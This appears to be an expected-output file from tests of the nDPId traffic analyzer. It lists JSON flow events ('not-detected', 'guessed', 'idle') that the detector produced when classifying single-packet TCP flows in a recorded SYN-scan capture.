-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 